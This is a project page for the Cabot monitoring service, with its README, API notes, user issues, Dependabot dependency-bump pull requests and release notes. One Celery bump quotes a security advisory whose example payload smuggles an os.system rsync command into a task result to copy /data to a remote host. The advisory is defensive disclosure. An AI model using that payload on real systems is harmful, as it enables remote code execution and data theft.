Self-hosted, easily-deployable monitoring and alerts service - like a lightweight PagerDuty

Last update: Dec 23, 2022

Overview

Cabot

Maintainers wanted

Cabot is stable and used by hundreds of companies and individuals in production, but it is not actively maintained. We would like to hand over maintenance of the project to one or more responsible and experienced maintainers. Please email [email protected] with some information about yourself (github profile and/or CV) if you are interested.

Why choose Cabot

Cabot is a free, open-source, self-hosted infrastructure monitoring platform that provides some of the best features of PagerDuty, Server Density, Pingdom and Nagios without their cost and complexity. (Nagios, I'm mainly looking at you.)

It provides a web interface that allows you to monitor services (e.g. "Stage Redis server", "Production ElasticSearch cluster") and send telephone, sms or hipchat/email alerts to your on-duty team if those services start misbehaving or go down - all without writing a line of code. Best of all, you can use data that you're already pushing to Graphite/statsd to generate alerts, rather than implementing and maintaining a whole new system of data collectors.

You can alert based on:

Metrics from Graphite
Status code and response content of web endpoints
Jenkins build statuses

We built Cabot as a Christmas project at Arachnys because we couldn't wrap our heads around Nagios, and nothing else out there seemed to fit our use case. We're open-sourcing it in the hope that others find it useful.

Cabot is written in Python and uses Django, Bootstrap, Font Awesome and a whole host of other goodies under the hood.

Screenshots

Services dashboard

Single service overview

Quickstart

Using Docker: Deploy in 5 minutes or less using official quickstart guide at cabotapp.com. (See also https://hub.docker.com/r/cabotapp/cabot/)

How it works

Docs have moved to cabotapp.com

Sections:

For those who want to contribute:

FAQ

Why "Cabot"?

My dog is called Cabot and he loves monitoring things. Mainly the presence of food in his immediate surroundings, or perhaps the frequency of squirrel visits to our garden. He also barks loudly to alert us on certain events (e.g. the postman coming to the door).

It's just a lucky coincidence that his name sounds like he could be an automation tool.

API

The API has automatically generated documentation available by browsing https://cabot.yourcompany.com/api. The browsable documentation displays example GET requests and lists other allowed HTTP methods.

To view individual items, append the item id to the url. For example, to view graphite_check 1, browse:

/api/graphite_checks/1/

Authentication

The API allows HTTP basic auth using standard Django usernames and passwords as well as session authentication (by submitting the login form on the login page). The API similarly uses standard Django permissions to allow and deny API access.

All resources are GETable by any authenticated user, but individual permissions must be granted for POST, PUT, and other write methods.

As an example, for POST access to all status_check subclasses, add the following permissions:

cabotapp | status check | Can add graphite status check
cabotapp | status check | Can add http status check
cabotapp | status check | Can add icmp status check
cabotapp | status check | Can add jenkins status check

Access the Django admin page at https://cabot.yourcompany.com/admin to add/remove users, change user permissions, add/remove groups for group-based permission control, and change group permissions.

Sorting and Filtering

Sorting and filtering can be used by both REST clients and on the browsable API. All fields visible in the browsable API can be used for filtering and sorting.

Get all jenkins_checks with debounce enabled and CRITICAL importance:

https://cabot.yourcompany.com/api/jenkins_checks/?debounce=1&importance=CRITICAL

Sort graphite_checks by name field, ascending:

https://cabot.yourcompany.com/api/graphite_checks/?ordering=name

Sort by name field, descending:

https://cabot.yourcompany.com/api/graphite_checks/?ordering=-name

Other (non-Cabot specific) examples are available in the Django REST Framework documentation.

License

See LICENSE file in this repo.

Comments

Support for 14.04

Currently, latest LTS of Ubuntu supported by cabot is 12.04, trying to install on 14.04 I get an error, not all dependencies are available. We can change install_dependencies.sh script, but it would be nice if 14.04. is supported without having to change source.

opened by zayim 39
Cabot alert plugins
Not expecting a merge right now. Just letting you know how the plugin architecture is going. the user preference page has been completely overhauled and has complete support for plugins. It doesn't render properly on mobile. Is that a target platform? If so I can try and make it work.

All tests are failing to the point that they won't even run at the moment - let alone pass.

There is currently no way to migrate.

Documentation still needs to be written.
opened by jonathanballs 24
Updates to allow installation on heroku
Note that this depends upon heroku/heroku-buildpack-python#271 to make cabot fully heroku-compatible with the auth ldap backend.

TODO:

[x] Fix tests

[x] Add a django manage script to create the user based on the provided env vars

[x] Cache nodejs/lessc requirement
opened by josegonzalez 22
Question on expected behavior

I'm a little confused on the concept of Services in relation to Checks with alerts/notifications.

Let me give a scenario.

Service: Web Farm Checks: CPU Warning (when CPU > 50%) CPU Error (when CPU > 75%) CPU Critical (when CPU > 95%)

Memory Warning (when memory > 75%) Memory Error (when memory > 85%) Memory Critical (when memory > 95%)

Given this setup when the CPU goes up quickly to 100%, the warning is triggered with an alert.
However, when the Error is triggered is doesn't generate an alert (no email or HipChat). Same goes for Critical, no email alert or HipChat.

Then after 10 minutes, it finally does send an alert with email and HipChat indicating the correct status of all checks. This seems a bit odd to me, is this correct functionality? Shouldn't an Error alert and Critical alert be sent right away instead of waiting 10 minutes?

Also, if during this time a memory alert is triggered there is no email alert or HipChat alert until 10 minutes passes. Why wait the 10 minutes ?

opened by Exocomp 16
How to create first user at setup time?
When you setup the service the first time you try to access it you get taken to the setup screen to create the first user. What would be the canonical way of creating such a user in an automatic way at setup time?

I want to do this because I also want to use the REST API to create my services and checks at setup time using Ansible.

I noticed that there is an auth_user table in the PostgreSQL database:

cabot=# select id,last_login,is_active,is_superuser,is_staff,username,email from auth_user; id | last_login | is_active | is_superuser | is_staff | username | email ----+-------------------------------+-----------+--------------+----------+----------+----------------- 1 | 2020-10-15 18:59:14.462219+00 | t | t | t | admin | [email protected]

Would just INSERTing a user into that table at setup time be enough to get an admin user going, or would I have to do something extra? Or is there a better way of achieving the same result?
opened by jakubgs 15
Cabot Plugin system
Hello all,

This is something that I've been working on for the past couple of weeks. It is almost finished however I'm going to have to take a short break to focus on end of year exams. This is reworking of Cabot's plugin system which will now support StatusCheck plugins. Other changes include:

Upgrade to Django 1.9

A new 'plugins' page which allow you to test alert plugins.

More tests.

A new user preferences page.

The new plugins are stored at https://github.com/cabotapp/ . The plugins are working and tested however there is still documentation to be done. My end of year exams are fast approaching so I'm taking a break however I am hoping to have this ready to merge by the end of the month. The only things left to do are documentation and migrations. I made a pull request for any comments or questions.

I welcome any comments,

Jonny
opened by jonathanballs 15

No url file available for plugin cabot_alert_*

Receiving these errors. Can someone point me in the right direction.

ERROR 2015-02-12 19:52:45,910 urls 8002 140634817193920 No url file available for plugin cabot_alert_hipchat
ERROR 2015-02-12 19:52:45,911 urls 8002 140634817193920 No url file available for plugin cabot_alert_email

opened by druchoo 14

Can't make the docker version works
Hello,

I wanted to try your cabot docker version, but it seems it doesn't work out of the box (unless I missed something).

Fresh VM (debian 10). Installed docker + docker compose

and I followed this => https://github.com/arachnys/cabot/issues/675#issuecomment-562936874

git clone https://github.com/cabotapp/docker-cabot cd /docker-cabot rename the production.env.template file to production.env docker-compose up -d

But then, this => http://192.168.1.27:5000 doesn't work (local IP of the VM).

Hmmm… can't reach this page 192.168.1.27 refused to connect.

I'm not familiar with docker (I kind of hate it, not gonna lie), so I don't really know what to check.

Any help would be appreciated !
opened by koopernick 13
Update to Django 1.7

Main changes are to migrations.

I started them again from scratch and then renamed check to status_check (as check is now reserved by django).

The plugins also needed updating to be django 1.7 compatible. (they have to defined their own migrations if they depend on an app with migrations now)

opened by frankh 12
No Django account prompted to be created

Hi all,

While running the outlined instructions, the deployment succeeds and launches cabot, but no where am I prompted to create a django admin account like suggested in the documentation. Any help would be greatly appreciated!

Deploy to the provisioned server:

$ fab deploy -H [email protected]

NB using ubuntu not root as above

Will prompt you to create a Django superuser which you'll use to log in via web and create additional users.

opened by ethandrower 12

Deployment fails on 12.04 container

Hello,

I have been trying to install cabot on a 12.04 Ubuntu container running on a Debian Jessie host.

The Provision step works without issue but the deployment step fails. I am not too sure how to proceed in a sane way, I don't use python to this level personally. Any ideas?

[ubuntu@monitor] sudo: foreman run -e conf/production.env /home/ubuntu/venv/bin/pip install --editable /home/ubuntu/2016-05-15-3270540 --exists-action=w
[ubuntu@monitor] out: Traceback (most recent call last):
[ubuntu@monitor] out:   File "/home/ubuntu/venv/bin/pip", line 5, in <module>
[ubuntu@monitor] out:     from pkg_resources import load_entry_point
[ubuntu@monitor] out: ImportError: No module named pkg_resources
[ubuntu@monitor] out:

opened by hiniko 12

Bump pyjwt from 1.7.1 to 2.4.0

Bumps pyjwt from 1.7.1 to 2.4.0.

Release notes

Sourced from pyjwt's releases.

2.4.0

Security

[CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24

What's Changed

Add support for Python 3.10 by @hugovk in jpadilla/pyjwt#699

Don't use implicit optionals by @rekyungmin in jpadilla/pyjwt#705

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#708

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#710

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#711

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#712

documentation fix: show correct scope for decode_complete() by @sseering in jpadilla/pyjwt#661

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#716

Explicit check the key for ECAlgorithm by @estin in jpadilla/pyjwt#713

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#720

api_jwk: Add PyJWKSet.getitem by @woodruffw in jpadilla/pyjwt#725

Update usage.rst by @guneybilen in jpadilla/pyjwt#727

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#728

fix: Update copyright information by @kkirsche in jpadilla/pyjwt#729

Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in jpadilla/pyjwt#734

Fixed typo in usage.rst by @israelabraham in jpadilla/pyjwt#738

Add detached payload support for JWS encoding and decoding by @fviard in jpadilla/pyjwt#723

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#740

Raise DeprecationWarning for jwt.decode(verify=...) by @akx in jpadilla/pyjwt#742

Don't mutate options dictionary in .decode_complete() by @akx in jpadilla/pyjwt#743

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#748

Replace various string interpolations with f-strings by @akx in jpadilla/pyjwt#744

Update CHANGELOG.rst by @hipertracker in jpadilla/pyjwt#751

New Contributors

@hugovk made their first contribution in jpadilla/pyjwt#699

@rekyungmin made their first contribution in jpadilla/pyjwt#705

@sseering made their first contribution in jpadilla/pyjwt#661

@estin made their first contribution in jpadilla/pyjwt#713

@woodruffw made their first contribution in jpadilla/pyjwt#725

@guneybilen made their first contribution in jpadilla/pyjwt#727

@dmahr1 made their first contribution in jpadilla/pyjwt#734

@israelabraham made their first contribution in jpadilla/pyjwt#738

@fviard made their first contribution in jpadilla/pyjwt#723

@akx made their first contribution in jpadilla/pyjwt#742

@hipertracker made their first contribution in jpadilla/pyjwt#751

Full Changelog: https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0

2.3.0

What's Changed

[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in jpadilla/pyjwt#700

Add exception chaining by @ehdgua01 in jpadilla/pyjwt#702

Revert "Remove arbitrary kwargs." by @auvipy in jpadilla/pyjwt#701

... (truncated)

Changelog

Sourced from pyjwt's changelog.

`v2.4.0 <https://github.com/jpadilla/pyjwt/compare/2.3.0...2.4.0>`__

Security


- [CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24
Changed

- Explicit check the key for ECAlgorithm by @estin in https://github.com/jpadilla/pyjwt/pull/713
- Raise DeprecationWarning for jwt.decode(verify=...) by @akx in https://github.com/jpadilla/pyjwt/pull/742
Fixed

- Don't use implicit optionals by @rekyungmin in https://github.com/jpadilla/pyjwt/pull/705
- documentation fix: show correct scope for decode_complete() by @sseering in https://github.com/jpadilla/pyjwt/pull/661
- fix: Update copyright information by @kkirsche in https://github.com/jpadilla/pyjwt/pull/729
- Don't mutate options dictionary in .decode_complete() by @akx in https://github.com/jpadilla/pyjwt/pull/743

Added


Add support for Python 3.10 by @hugovk in https://github.com/jpadilla/pyjwt/pull/699
api_jwk: Add PyJWKSet.getitem by @woodruffw in https://github.com/jpadilla/pyjwt/pull/725
Update usage.rst by @guneybilen in https://github.com/jpadilla/pyjwt/pull/727
Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @dmahr1 in https://github.com/jpadilla/pyjwt/pull/734
Fixed typo in usage.rst by @israelabraham in https://github.com/jpadilla/pyjwt/pull/738
Add detached payload support for JWS encoding and decoding by @fviard in https://github.com/jpadilla/pyjwt/pull/723
Replace various string interpolations with f-strings by @akx in https://github.com/jpadilla/pyjwt/pull/744
Update CHANGELOG.rst by @hipertracker in https://github.com/jpadilla/pyjwt/pull/751

v2.3.0 &amp;lt;https://github.com/jpadilla/pyjwt/compare/2.2.0...2.3.0&amp;gt;__
Fixed

- Revert &amp;quot;Remove arbitrary kwargs.&amp;quot; `[#701](https://github.com/jpadilla/pyjwt/issues/701) &amp;lt;https://github.com/jpadilla/pyjwt/pull/701&amp;gt;`__

Added


Add exception chaining [#702](https://github.com/jpadilla/pyjwt/issues/702) &amp;lt;https://github.com/jpadilla/pyjwt/pull/702&amp;gt;__

v2.2.0 &amp;lt;https://github.com/jpadilla/pyjwt/compare/2.1.0...2.2.0&amp;gt;__
&lt;/tr&gt;&lt;/table&gt;
</code></pre>
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/jpadilla/pyjwt/commit/83ff831a4d11190e3a0bed781da43f8d84352653"><code>83ff831</code></a> chore: update changelog</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/4c1ce8fd9019dd312ff257b5141cdb6d897379d9"><code>4c1ce8f</code></a> chore: update changelog</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/96f3f0275745c5a455c019a0d3476a054980e8ea"><code>96f3f02</code></a> fix: failing advisory test</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/9c528670c455b8d948aff95ed50e22940d1ad3fc"><code>9c52867</code></a> Merge pull request from GHSA-ffqj-6fqr-9h24</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/24b29adfebcb4f057a3cef5aaf35653bc0c1c8cc"><code>24b29ad</code></a> Update CHANGELOG.rst (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/751">#751</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/31f5acb8fb3ec6cdfe2b1b0a4a8f329b5f3ca67f"><code>31f5acb</code></a> Replace various string interpolations with f-strings (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/744">#744</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/5581a31c21de70444c1162bcfa29f7e0fc86edda"><code>5581a31</code></a> [pre-commit.ci] pre-commit autoupdate (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/748">#748</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/3d4d82248f1120c87f1f4e0e8793eaa1d54843a6"><code>3d4d822</code></a> Don't mutate options dictionary in .decode_complete() (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/743">#743</a>)</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/1f1fe15bb41846c602b3e106176b2c692b93a613"><code>1f1fe15</code></a> Add a deprecation warning when jwt.decode() is called with the legacy verify=...</li>
<li><a href="https://github.com/jpadilla/pyjwt/commit/35fa28e59d99b99c6a780d2a029a74d6bbba8b1e"><code>35fa28e</code></a> [pre-commit.ci] pre-commit autoupdate (<a href="https://github-redirect.dependabot.com/jpadilla/pyjwt/issues/740">#740</a>)</li>
<li>Additional commits viewable in <a href="https://github.com/jpadilla/pyjwt/compare/1.7.1...2.4.0">compare view</a></li>
</ul>
</details>
<br />


Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.


		                                  
		                                    dependencies



opened by dependabot[bot]  0












Bump celery from 4.2.1 to 5.2.2




Bumps celery from 4.2.1 to 5.2.2.

Release notes
Sourced from celery's releases.

5.2.2
Release date: 2021-12-26 16:30 P.M UTC+2:00
Release by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).

When a task fails, the failure information is serialized in the
backend. In some cases, the exception class is only importable
from the consumer's code base. In this case, we reconstruct the
exception class so that we can re-raise the error on the process
which queried the task's result. This was introduced in #4836. If
the recreated exception type isn't an exception, this is a
security issue. Without the condition included in this patch, an
attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data") by
setting the task's result to a failure in the result backend with
the os, the system function as the exception type and the payload
rsync /data [email protected]:~/data as the exception
arguments like so:
{
      "exc_module": "os",
      'exc_type': "system",
      "exc_message": "rsync /data [email protected]:~/data"
}

According to my analysis, this vulnerability can only be exploited
if the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result. The attacker would also have to
gain access to the result backend. The severity of this security
vulnerability is low, but we still recommend upgrading.



v5.2.1
Release date: 2021-11-16 8.55 P.M UTC+6:00
Release by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.
Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.



... (truncated)


Changelog
Sourced from celery's changelog.

5.2.2
:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz


Various documentation fixes.


Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data [email protected]:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:
.. code-block:: python
  {
        "exc_module": "os",
        'exc_type': "system",
        "exc_message": "rsync /data [email protected]:~/data"
  }

According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.


.. _version-5.2.1:
5.2.1
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

Fix rstrip usage on bytes instance in ProxyLogger.
Pass logfile to ExecStop in celery.service example systemd file.
fix: reduce latency of AsyncResult.get under gevent (#7052)
Limit redis version: <4.0.0.
Bump min kombu version to 5.2.2.



... (truncated)


Commits

b21c13d Bump version: 5.2.1 → 5.2.2
a60b486 Add changelog for 5.2.2.
3e5d630 Fix changelog formatting.
1f7ad7e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).
2d8dbc2 Update configuration.rst
9596aba Fix typo in documentation
639ad83 update doc to reflect Celery 5.2.x (#7153)
d32356c Bump version: 5.2.0 → 5.2.1
6842a78 Merge branch 'master' of https://github.com/celery/celery
4c92cb7 changelog for v5.2.1
Additional commits viewable in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies 



opened by dependabot[bot]  0














Bump django from 1.11.29 to 2.2.28




Bumps django from 1.11.29 to 2.2.28.

Commits

5c33000 [2.2.x] Bumped version for 2.2.28 release.
29a6c98 [2.2.x] Fixed CVE-2022-28347 -- Protected QuerySet.explain(**options) against...
2c09e68 [2.2.x] Fixed CVE-2022-28346 -- Protected QuerySet.annotate(), aggregate(), a...
8352b98 [2.2.x] Added stub release notes for 2.2.28.
2801f29 [2.2.x] Reverted "Fixed forms_tests.tests.test_renderers with Jinja 3.1.0+."
e03648f [2.2.x] Fixed forms_tests.tests.test_renderers with Jinja 3.1.0+.
9d13d8c [2.2.x] Fixed typo in release notes.
047ece3 [2.2.x] Added CVE-2022-22818 and CVE-2022-23833 to security archive.
2427b2f [2.2.x] Post-release version bump.
e541f2d [2.2.x] Bumped version for 2.2.27 release.
Additional commits viewable in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies 



opened by dependabot[bot]  0














Bump python-ldap from 3.1.0 to 3.4.0




Bumps python-ldap from 3.1.0 to 3.4.0.

Release notes
Sourced from python-ldap's releases.

3.4.0
This release requires Python 3.6 or above,
and is tested with Python 3.6 to 3.10.
Python 2 is no longer supported.
New code in the python-ldap project is available under the MIT licence
(available in LICENCE.MIT in the source). Several contributors have agreed
to apply this licence their previous contributions as well.
See the README for details.
The following undocumented functions are deprecated and scheduled for removal:

ldap.cidict.strlist_intersection
ldap.cidict.strlist_minus
ldap.cidict.strlist_union

Security fixes:

Fix inefficient regular expression which allows denial-of-service attacks
when parsing specially-crafted LDAP schema.
(GHSL-2021-117)

Changes:

On MacOS, remove option to make LDAP connections from a file descriptor
when built with the system libldap (which lacks the underlying function,
ldap_init_fd)
Attribute values of the post read control are now bytes
instead of ISO8859-1 decoded str
LDAPUrl now treats urlscheme as case-insensitive
Several OpenLDAP options are now supported:

OPT_X_TLS_REQUIRE_SAN
OPT_X_SASL_SSF_EXTERNAL
OPT_X_TLS_PEERCERT



Fixes:

The copy() method of cidict was added back. It was unintentionally
removed in 3.3.0
Fixed getting/setting SASL options on big endian platforms
Unknown LDAP result code are now converted to LDAPexception,
rather than raising a SystemError.

slapdtest:

Show stderr of slapd -Ttest
SlapdObject uses directory-based configuration of slapd
SlapdObject startup is now faster

Infrastructure:

CI now runs on GitHub Actions rather than Travis CI.

3.3.1
Released 3.3.1 2020-06-29


... (truncated)


Commits

See full diff in compare view





Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options


You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
@dependabot use these labels will set the current labels as the default for future PRs for this repo and language
@dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
@dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
@dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

You can disable automated security fix PRs for this repo from the Security Alerts page.

dependencies 



opened by dependabot[bot]  0














Docker Images build fails




When build the freshly cloned repo docker-compose build fails with:
Collecting pip
  Downloading https://files.pythonhosted.org/packages/52/e1/06c018197d8151383f66ebf6979d951995cf495629fc54149491f5d157d0/pip-21.2.4.tar.gz (1.6MB)
    Complete output from command python setup.py egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-build-IBoPUJ/pip/setup.py", line 7
        def read(rel_path: str) -> str:
                         ^
    SyntaxError: invalid syntax
    
    ----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-IBoPUJ/pip/
You are using pip version 8.1.2, however version 21.2.4 is available.
You should consider upgrading via the 'pip install --upgrade pip' command.
The command '/bin/sh -c pip install --upgrade pip' returned a non-zero code: 1
ERROR: Service 'web' failed to build

Updating the base image in the dockerfile can fix this.



opened by paulkitt  1



Releases(0.11.7)







0.11.7(Sep 14, 2017)




Fix check plugins not displaying checks correctly on service details page

Source code(tar.gz)
Source code(zip)










0.11.6(Sep 14, 2017)




Add cloudwatch check plugin to dockerfile by default

Can be enabled by adding "cabot_check_cloudwatch" to CABOT_PLUGINS_ENABLED



Source code(tar.gz)
Source code(zip)










0.11.5(Sep 11, 2017)




Fix multiple jenkins configs not working properly

Due to caching on the client, the first config to be checked would always be used



Source code(tar.gz)
Source code(zip)










0.11.4(Sep 7, 2017)




Switch from jenkinsapi to python-jenkins

Fixes performance regression introduced in 0.11



Source code(tar.gz)
Source code(zip)










0.11.1(Aug 22, 2017)




Reduce time to store old check results to 7 days

Currently stores for 2 months, but there's no actual way to view the old data.


Jenkins support:

Fail Jenkins checks when job is unknown
Use jenkinsapi to talk to Jenkins
Add option to specify multiple Jenkins backends


NOTE: This update will delete any recent status check results for jenkins checks


Add view for public services
Add support for Google OAuth login
Add ability to add custom check plugins

See https://gitlab.com/as-public/cabot-check-skeleton for an example


Remove deprecated Fabfile and Shell scripts

Source code(tar.gz)
Source code(zip)










0.10.8(May 12, 2017)




Update slack alert to 0.8.1

fixes names not linking
only shows the acknowledge button if "SLACK_INTERACTIVE_MESSAGES" is set

(The feature only works if set up correctly on the slack end)




Update to django 1.11 (with working django-polymorphic this time)

Source code(tar.gz)
Source code(zip)










0.10.7(May 4, 2017)




Update slack alert plugin

Now shows an "acknowledge" button within slack


Fix alert tests not triggering if:

A user had acknowledged working on the service
A legitimate alert had been sent recently


Add support for GitHub OAuth logins

See http://cabotapp.com/use/users.html



Source code(tar.gz)
Source code(zip)










0.10.6(May 4, 2017)




Fix plugin urls being overridden by plugin settings urls

This fixes e.g. the twilio callback url not working


Fix profile settings sidebar links not working

Source code(tar.gz)
Source code(zip)










0.10.5(Apr 28, 2017)




Fix bug which caused status graphs to sometimes not render
Fix issue with complex recurring calendar - 'vDDDLists' object is not iterable
Fix css regression in logo/title

Source code(tar.gz)
Source code(zip)










0.10.4(Apr 28, 2017)




Fix basic auth passwords getting reset when editing checks
Fix plugin alert tests alerting the current duty officer

They should now always alert only the user that runs the test



Source code(tar.gz)
Source code(zip)










0.10.3(Apr 28, 2017)




Add plugin settings views with the ability to test alerts.
Allow user filter for LDAP to be configured

Set the AUTH_LDAP_USER_FILTER setting to change it (defaults to "(uid=%(user)s)")


Update cabot-alert-hipchat plugin to 2.0.2

Fixes bug when both HIPCHAT_URL and HIPCHAT_DOMAIN were set



Source code(tar.gz)
Source code(zip)










0.10.2(Apr 4, 2017)




Update cabot-alert-hipchat plugin to 2.0.1

Supports Hipchat API v2
If HIPCHAT_URL is set, it will use the old v1 api
Use HIPCHAT_DOMAIN for custom hipchat v2 deployments


Add interactive api docs (using djangorestframework 3.6) at /docs

Source code(tar.gz)
Source code(zip)










0.10.1(Apr 4, 2017)




[BUGFIX] Update cabot_alert_twilio to 1.3.1

1.3.0 was still broken on django 1.10



Source code(tar.gz)
Source code(zip)










0.10.0(Apr 4, 2017)




Add feedback notifications when updated profile
